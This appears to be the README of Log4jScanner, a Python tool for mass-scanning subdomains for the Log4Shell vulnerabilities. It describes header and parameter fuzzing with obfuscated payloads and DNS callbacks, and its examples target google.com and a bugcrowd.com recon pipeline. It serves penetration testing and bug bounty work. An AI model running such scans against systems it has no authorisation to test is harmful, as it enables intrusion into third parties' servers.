Log4jScanner 1.2
Log4jScanner
Log4jScanner is a Log4j Related CVEs Scanner, Designed to Help Penetration Testers to Perform Black Box Testing on given subdomains.
Disclaimer
:computer: This project was created only for good purposes and personal use.
THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.
Features
Fast & MultiThreaded
Scan for Log4j RCE (CVE-2021-44228, CVE-2021-45046)
Over 30 Obfuscated Log4j Payload
Mainly Designed for Mass Scale Bug Bounty
Available Scan Type: Basic Scan & Full Scan
In Basic Scan, Only 1 Basic Log4Shell Payload is used for testing web app
In Full Scan, All Available Log4Shell Payloads are used
Log4jScanner Fuzz all the potential endpoints such as
HTTP Headers
GET Based Parameter + Without Malicious Headers
POST Based Paramter with JSON Body + Without Malicious Headers
POST Based Paramater with Post Parameters + Without Malicious Headers
GET Based Parameter + With Malicious Headers
POST Based Paramter with JSON Body + With Malicious Headers
POST Based Paramater with Post Parameters + With Malicious Headers
Log4jScanner Also tries to Fuzz Possible POST Parameters such as:
Feel FREE to Add/Remove any POST Parameter
["username", "user", "email", "email_address", "password", "id", "action", "page", "q", "submit", "token", "data", "order", "lang", "search", "redirect", "country", "hidden"]
Prerequisite
Python 3.X
Installation
Install Python3 on your system, As Python comes preinstalled in Linux & MacOS, Simply run this pip command
This Python Module is OS Independent, & thus you can easily install it using this pip command
$ python3 -m pip install Log4jScanner
OR
$ pip3 install Log4jScanner
Usage
Type log4jscanner -h for help menu
Only --url-list or --url are mandatory parameter/flags.
You can also import this module in your code
from log4jscanner import Log4jScanner
# test = Log4jScanner.Log4jScanner(file_containing_urls, url_list, ThreadNumber, timeout, custom_dns_callback_host, dns_callback_provider, disable_redirect, exclude_user_agent_fuzzing, basic_scan, file_containing_headers)
# Available Headers file path: db/headers-large.txt, db/headers-minimal.txt, db/headers.txt
# Or you can Given Full Path of File Containing HTTP Request Headers
test = Log4jScanner.Log4jScanner("", ["https://google.com"], 30, 30, "", "interact.sh", False, False, False, "db/headers.txt")
vuln_url_list = test.start()
for url in vuln_url_list:
print(url)
Usage Example
# Basic Recon (Passive Subdomain Enumeration)
$ subfinder -d bugcrowd.com -nC -silent -o subdomains.txt && cat subdomains.txt | httpx -nc -silent > httpx_subdomains.txt
$ log4jscanner -m httpx_subdomains.txt
Screenshots:
Help Menu
Single URL - Basic Scan
Link:
Documentation
PyPI
License
This project is licensed under the GNU License (see the LICENSE file for details).
For personal and professional use. You cannot resell or redistribute these repositories in their original state.
There are no reviews.